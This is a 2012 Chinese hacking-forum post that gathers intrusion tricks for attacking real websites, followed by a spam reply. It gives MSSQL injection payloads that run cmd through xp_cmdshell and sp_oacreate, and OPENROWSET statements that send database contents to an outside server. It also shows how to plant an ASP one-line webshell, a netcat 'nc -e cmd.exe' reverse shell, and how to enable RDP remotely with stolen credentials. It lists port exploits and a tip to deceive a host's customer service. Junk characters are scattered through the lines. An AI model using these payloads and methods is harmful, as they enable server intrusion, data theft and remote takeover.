找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3411|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
& `# p1 W3 A4 j( [' H" E* W. t1 N- m5 ~  k( h5 }

' C2 }7 s; K1 jSA点数据库分离搞法+语句:- T3 ^: G- O1 a: w( S

$ B4 o' \" D* h) C) r0 ?注射点不显错,执行下面三条语句页面都返回正常。" M; j) I5 _; L' K; n9 o
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')+ f' i6 Q, q2 B( ^3 f4 o8 X0 |5 W. \
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')- [# z+ S+ K( c; C
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'). u  z' w5 L! I- g  m' F6 |8 m
可以列目录,判断系统为2000,web与数据库分离9 Y" m4 w% A& h. b5 b1 L- Y* H1 m& j
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
* u9 a% @4 P: B  P1 h在注射点上执行6 F1 W! I0 N) r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--5 M! s8 \" O) W" U4 A
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP, Q8 m1 N# T6 w$ q
还有我用NC监听得其他端口都没有得到IP。3 g/ q0 p# A* b3 ~
4 h  X) o# D) F6 ?; b& R* a
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
+ M$ N! ?* R+ P" n. R'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
3 S5 a* y6 k0 |& I! F) {4 j" Q+ z: u7 @8 r2 Y, T  {* z
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
3 k) J) R4 ?0 u/ |
* f8 i  R) i5 K现在就猜想是不是数据库是内网而且不能连外网。
" M9 w& D$ F1 K; K& m3 ]0 G, c; _7 w# b1 G
; J* M& I; h3 n$ ^; s& Z
access导出txt文本代码$ L; ~0 B7 u+ B% x1 X) F5 b: n. W6 u
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin3 Q* K1 L4 G# a7 I, J
3 V+ O% `& q1 N

- P! k% Z/ v! r' h8 k7 L9 r7 l: O$ v1 |9 c8 g' C' \% H
自动跳转到指定网站代码头
0 _; T% r+ x2 \( D& Y) s<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
; ~. ^7 h! _& P, H& P# {
) n# |8 G+ O& D
7 G8 l# U8 W3 p0 y: c* W5 f入侵java or jsp站点时默认配置文件路径:
2 P) h  X. L# \1 ~* V\web-inf\web.xml* {- m0 ~6 y. J) t4 p7 r& e
tomcat下的配置文件位置:+ X  Z3 V) A/ w% a
\conf\server.xml            (前面加上tomcat路径)$ ]0 e: K# q$ S7 y, P
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
, h" m; o" K  A: K7 Z  Q9 [2 S9 |1 B5 P

0 w* h' a9 p+ g& a# k
  w. y! R/ S$ q& x3 r' i检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
/ g2 R2 W$ `+ d1 Y  c' W( L- Q' j-1%237 u# Q( j$ Y1 t2 E- O( K/ b  R
>
+ x5 b: C. E; }$ l' o* Z4 n<) ]. K6 C* R" M3 Q8 F
1'+or+'1'='1
7 h+ [# Z  L* f( oid=8%bf
/ u$ x! U, s" z: q
% J0 ~4 \9 M5 ]/ V% Y1 e  M7 S2 r全新注入点检测试法:
$ v& r  p" z3 _在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
# p7 }, Y( E7 |8 y$ m. `+ J( X* D
- V' b! `& R2 Z+ Q/ v+ s- d/ Y/ L在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。" `* ~, m2 A% \# |) s6 {1 R: j: b

* l0 Y: ?5 [! j1 ~& @搜索型注入判断方法:
- I8 T+ H& u2 d北京%' and '1'='1' and '%'='
0 G7 N* N1 E$ v* D  J北京%' and '1'='2' and '%'='
, o5 w9 v" E/ H3 `3 [" Q8 R/ D* f# Z' V' z; a

: T& Y. |. S( \* J6 I$ U7 i* hCOOKIES注入:
6 Z( b* r9 W, Q6 J- d7 b6 L8 D  f# [: F1 F2 r+ u+ n0 P6 O3 s1 h
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
- v3 U& X. ]2 e& K; f2 U1 B  @
$ R) h# Q- w' V1 \& f2000专业版查看本地登录用户命令:# J. {% f8 E! e# x
net config workstation
; R5 ^2 L9 Z$ v5 @' S0 R, p; j6 J  u) a; K8 o; C; V

: @/ c# H$ f* L! D8 [2003下查看ipsec配置和默认防火墙配置命令:$ n4 w4 N0 U& O
netsh firewall show config
5 c  @0 ~% t% K5 Z5 xnetsh ipsec static show all
( t% m% {- q$ Z8 h) ]* Z  W3 S8 r1 e& c! K: h6 T8 D
不指派指定策略命令:: n4 Q( t' d) n: S7 Z  U, \) [1 u/ _
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)$ n" s, v- y2 I5 }7 Z
netsh ipsec static show policy all  显示策略名; ]4 W5 ^5 f, w9 J8 @1 I' |( G

0 X0 ]. G' e! m% a7 `' F( F9 c
6 _' h9 s0 p* F/ X- g; \( U6 I: f猜管理员后台小技巧:
9 t% a4 ^6 N! B; x5 A% Y5 eadmin/left.asp 3 U, H3 k+ @2 P! h8 b9 Z
admin/main.asp$ W- A& f4 N2 L6 I- T
admin/top.asp
) e2 E+ E+ I0 j" u- W* T* iadmin/admin.asp * o+ D8 P1 [" E% {; ]7 s) F
会现出菜单导航,然后迅雷下载全部链接
3 r3 p0 N8 j. N) G) G
! ~! ^& o9 v- T% {: U) j8 f" a5 v% q
社会工程学:9 K& ^& o8 c" K' z
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人1 u" ], P2 ]. D
然后去骗客服! p8 Y- R+ L; ]4 j0 o0 k

0 o5 k% U, b. f* ~, T6 Y! u! N7 I( n( b0 k$ Q" R0 M
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
2 B1 \5 M3 j7 {5 R/ r- p查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, * g0 w0 o8 C5 p
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
& y9 O( }7 o# s* N% Z9 M4 t% U" ^3 ]0 d

- ^3 t$ c5 X" _, G& d/ w+ Z. h( s5 Q$ a" {: _- ]& f! g1 I
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
$ R+ B0 r# e- p7 r7 F" X
9 K' f7 T- a3 n9 G% g/ ?* R; \
' y8 N7 V! ~, o0 I% {2 [5 r+ y. b% b/ G' V; B6 s
CMD加密注册表位置
( x. E* |- |2 O) l$ e(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
8 \% v* `: T: tAutoRun& F1 `0 \5 i! N8 s+ w% c. v
8 [: C. |3 N  j  \4 ]2 s7 N" ^
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
/ Y; B- D/ n) VAutoRun
9 ]4 [: E0 e# v! u+ x  J! t6 b; H
- K5 E, O' T) L# v  c4 k; M# v
在找注入时搜索Hidden,把他改成test- r& M  f! g/ E; k. v
+ \; J* W) J4 T5 J& P

( J% ]. }+ p: c: e; G7 t/ u, _$ J5 _# c- s' N% k0 Y  Y
mstsc /v:IP /console 9 J5 _. F6 \# o8 a
+ C/ Q# L& J% J1 v0 `0 D, f
  _/ S( X1 A' N, l+ F$ h) M
一句话开3389:. R+ ~  F5 p( W% J5 M1 O
+ i, h* P. d  r
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  & E. ~$ j( n9 k2 {% b1 o3 p1 K
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
& A3 o" ~- g8 |7 o6 p* X3 F: `' p' C) g+ K, f0 w% r

4 g4 X9 O9 E0 y* w$ m, t知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:2 Q5 [. p8 r8 s+ j
Insert into admin(user,pwd) values('test','test')
. A$ ^6 Z, X, o2 x% i/ t1 G2 F5 u1 W& Y! l
; z3 G) @5 K3 Y/ [+ A' R8 V
NC反弹
; J) w4 I  I( {/ [! t6 R3 F先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   + N+ ]0 K- B0 W3 _
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
5 C* H- u; T$ W4 A! c' V: Z, H8 L, @) e% n( a' N

% W7 B# i0 B2 b  m9 s( I在脚本入侵过程中要经常常试用%00来确认下参数是否有问题- ^) R8 Q/ R1 W  X' J' `* z

" j3 x2 t) O2 |9 N4 h, g& f有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录3 d% ?7 @- s# o; t$ e6 N4 Q
例如:
) u+ d% W) L- E$ M  J% v; y9 msubst k: d:\www\ 用d盘www目录替代k盘
4 v0 i0 r/ T  a; I, ksubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表